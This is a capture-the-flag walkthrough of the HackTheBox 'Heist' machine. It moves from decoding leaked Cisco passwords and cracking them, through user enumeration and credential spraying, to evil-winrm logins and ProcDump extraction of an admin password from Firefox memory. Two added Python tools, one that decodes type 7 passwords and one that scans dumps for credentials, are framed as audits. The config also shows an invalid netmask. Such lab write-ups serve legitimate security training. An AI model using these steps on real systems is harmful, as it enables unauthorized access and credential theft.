HackTheBox - Heist


Heist was a nice 20 point box created by MinatoTW. It started out with finding a Cisco router config file and cracking some hashes, enumerating more users and then logging in via WinRM to get the user flag. We then dumped the local Firefox processes with ProcDump, used some simple PowerShell for basic process dump analysis, found admin credentials and logged in again via WinRM to get root.

User.txt

Nmap


We start the box with a quick TCP nmap scan:

# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.149 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && 
nmap -sV -sC -T4 -p$ports 10.10.10.149

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC


HTTP


Navigating to http://10.10.10.149/ we come across a login page:


Clicking on ‘Login as guest’ leads us to issues.php which contains the following information:


Checking out the ‘Attachment’ on the first post by Hazard displays a config.txt file for their Cisco router:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh


Hash Cracking


The config.txt file contains the following three hashes:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

The number 7 next to the bottom two password hashes indicates that they are Cisco type 7 and can be easily decrypted at Cisco Password Cracker. The results are shown below:



The $1$pdQG$o8nrSzsGXeaduXrjlvKc91 hash can be cracked quickly with JohnTheRipper:

# john --wordlist=/root/rockyou.txt --rules hash 
stealth1agent    (?)
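As an added example (not from the original write-up), here is a small config audit that shows why the two "password 7" lines above fall so easily: Cisco type 7 is an XOR with a fixed, well-known key, so "service password-encryption" only obfuscates the plaintext, while the type 5 "enable secret" is an MD5-crypt hash that still has to be cracked offline. The three credential lines are taken from config.txt; the audit verdicts are my own wording.

```python
import re

# Cisco's fixed type 7 key. Type 7 is an obfuscation, not a hash: XOR with a known,
# rolling key, so every type 7 string reverses instantly with no cracking at all.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

def decode_type7(encoded):
    """Reverse a type 7 string: two decimal digits of key offset, then hex bytes XORed with the key."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data)).decode()

# username <name> [privilege N] password <type> <value>  |  enable secret <type> <value>
CRED_RE = re.compile(r"^(?:username (\S+)(?: privilege \d+)? password|enable secret) (\d) (\S+)$", re.M)

# Audit wording is mine, not Cisco's; type 8/9 are the current recommended formats.
VERDICT = {
    "0": "plaintext",
    "5": "MD5-crypt: cheap to attack offline with a wordlist, migrate to type 8/9",
    "7": "reversible obfuscation, treat as plaintext",
    "8": "PBKDF2-SHA256, acceptable",
    "9": "scrypt, acceptable",
}

def audit_config(config_text):
    """One finding per credential line; type 7 values are decoded to prove they are not protected."""
    findings = []
    for user, ptype, value in CRED_RE.findall(config_text):
        finding = {"account": user or "enable", "type": ptype,
                   "verdict": VERDICT.get(ptype, "unknown type, review")}
        if ptype == "7":
            finding["recovered"] = decode_type7(value)
        findings.append(finding)
    return findings

# The credential lines from the config.txt above, embedded so this runs stand-alone.
# "service password-encryption" is what turned otherwise-plaintext passwords into type 7.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```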


Credentials


From what we’ve gathered so far we can create a list of usernames and passwords we’ve found and cracked in the config.txt file:

Hazard / ??? - stealth1agent maybe?
rout3r / $uperP@ssword
admin  / Q4)sJu\Y8qz*A3?d

Given that none of these credentials work on the first login screen we encountered on port 80, we can deduce that they are needed elsewhere in order for us to progress.

From our nmap scan we can see that SMB (445) and WinRM (5985) are both open. None of the creds succeeded for WinRM, but hazard / stealth1agent did work for SMB. However, there wasn’t anything of use in any of the shares.


Lookupsid.py


Leveraging the lookupsid.py script from Impacket we’re able to enumerate for more users with Hazard’s SMB credentials.

A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

# python lookupsid.py heist/hazard:stealth1agent@10.10.10.149
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Descriptions of each Impacket script can be found here.


CrackMapExec


As we’ve now got a lot more usernames to work with, we can use CrackMapExec to check if any of the new usernames can be used with the passwords we already possess in order to log into SMB. First we need to create a usernames file:

# cat usernames 
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
None
support
Chase
Jason
rout3r
admin

Secondly we create a passwords file with the three hashes inside:

# cat passwords 
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d

All we have to do now is run the following CrackMapExec command:


We see Chase / Q4)sJu\Y8qz*A3?d was successful.


Evil-winrm


Since WinRM is open (5985) we can use evil-winrm to log in with these credentials:

# ./evil-winrm.rb -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase


Flag


All we have to do now is change directory and we get the user flag.

*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> cat user.txt
a127da...


Root.txt

Enumeration


During our usual enumeration we notice there are multiple Firefox processes running:

*Evil-WinRM* PS C:\Users\Chase\desktop> Get-Process 

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
   1233      68   106768     179916      27.86   2236   1 firefox
    343      20    10056      37456       0.55   3164   1 firefox
    408      31    17432      61252       2.02   4036   1 firefox
    390      30    27464      59848      22.55   4348   1 firefox
    358      26    16324      37588       0.47   6256   1 firefox


ProcDump


ProcDump is a tool we can use to dump the Firefox process data.

ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. It also can serve as a general process dump utility that you can embed in other scripts.


Dumping Firefox Processes


Once you’ve downloaded ProcDump from the link in the previous section, we need to upload it to Heist like so:

*Evil-WinRM* PS C:\Users\Chase\Documents> upload /root/Downloads/procdump.exe
Info: Uploading /root/Downloads/procdump.exe to .
Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\Users\Chase\Documents> dir

    Directory: C:\Users\Chase\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/28/2019   7:13 PM         651424 procdump.exe 

With ProcDump successfully uploaded we can dump each Firefox process and then analyse the files for any sensitive information:

*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump.exe -accepteula -ma 6256
  
ProcDump v9.0 - Sysinternals process dump utility 
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com   
                                                        
[19:14:54] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_191128_191454.dmp 
[19:14:55] Dump 1 writing: Estimated dump file size is 280 MB.         
[19:14:59] Dump 1 complete: 280 MB written in 5.0 seconds 
[19:15:00] Dump count reached.                                            


Process Dump Analysis


After dumping each process we can then use the PowerShell cmdlet Select-String to ‘grep’ through the dump file for specific words/patterns.

The Select-String cmdlet searches for text and text patterns in input strings and files.

Looking for instances of the string ‘admin’ we get the following information returned:

*Evil-WinRM* PS C:\Users\Chase\Documents> cat firefox.exe_191128_191454.dmp | Select-String -Pattern 'admin'  
                                                             
_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_C¨^·(VœàšgÿP÷‚]CTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash                  
Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla        
Firefox\firefox.exeMOZ¨^·(VœGgÿGgÿRG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Prog 
ram Files\Mozilla Firefox\browser\crashreporter-override.iniNU

Removing all the junk we see a login request made by the admin with their username and password in clear text:

/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ
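The Select-String pass above works, but the hit is buried in binary junk and the credential lands in the terminal in clear text. As an added example (not from the original write-up), the scanner below does the same job over raw dump bytes: it pulls out every host/path?query fragment, cuts the query where the next environment variable is glued on (as "MOZ_CRASHREPORTER_STRINGS_OVERRIDE=" was above), flags sensitive parameter names, and produces a redacted report that is safe to paste into a ticket. The sample bytes are constructed to mimic the dump output above; the password value in them is made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample (not a real dump): printable fragments with binary junk around them,
# shaped like the MOZ_CRASHREPORTER_* environment block Firefox keeps in process memory.
# The password value is made up for this example.
SAMPLE_DUMP = (
    b"\x00\x00MOZ_CRASHREPORTER_RESTART_ARG_0=C:\\Program Files\\Mozilla Firefox\\firefox.exe"
    b"MOZ\xa8^\xb7(V\x9cGg\xffRG_1=localhost/login.php?login_username=admin@support.htb"
    b"&login_password=Example-Secret-1&login=MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\\Prog"
    b"\x00ram Files\\Mozilla Firefox\\browser\\crashreporter-override.ini\x00"
)

# host[:port]/path?query; the query stops where the next SHOUTY_ENV_NAME= is glued on.
URL_RE = re.compile(rb"[A-Za-z0-9.\-]+(?::\d+)?/[A-Za-z0-9_./\-]*\?(?:(?![A-Z_]{4,}=)[!-~])+")
SENSITIVE = ("password", "passwd", "pwd", "secret", "token")

def find_leaked_credentials(blob):
    """Return one finding per URL in `blob` whose query string carries a sensitive parameter."""
    findings = []
    for m in URL_RE.finditer(blob):
        url = m.group().decode("latin-1")
        parts = urlsplit(url if "://" in url else "//" + url)
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        hits = [k for k in params if any(s in k.lower() for s in SENSITIVE)]
        if hits:
            findings.append({"host": parts.netloc, "path": parts.path,
                             "params": params, "sensitive": hits})
    return findings

def redacted_report(findings):
    """Lines safe to share: usernames kept, secret values replaced by their length."""
    lines = []
    for f in findings:
        shown = {k: ("<redacted %d chars>" % len(v) if k in f["sensitive"] else v)
                 for k, v in f["params"].items()}
        lines.append("%s%s %s" % (f["host"], f["path"], shown))
    return lines

if __name__ == "__main__":
    for line in redacted_report(find_leaked_credentials(SAMPLE_DUMP)):
        print(line)
```

The root cause this surfaces is a login form submitting credentials in the query string, which then persist in process memory, crash-reporter restart arguments, browser history and server logs; moving the form to POST removes the whole class of leak.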

With these credentials we’re able to log in via WinRM as Administrator.

# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator


Flag


All we have to do now is change directory and we get root.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
50dfa3...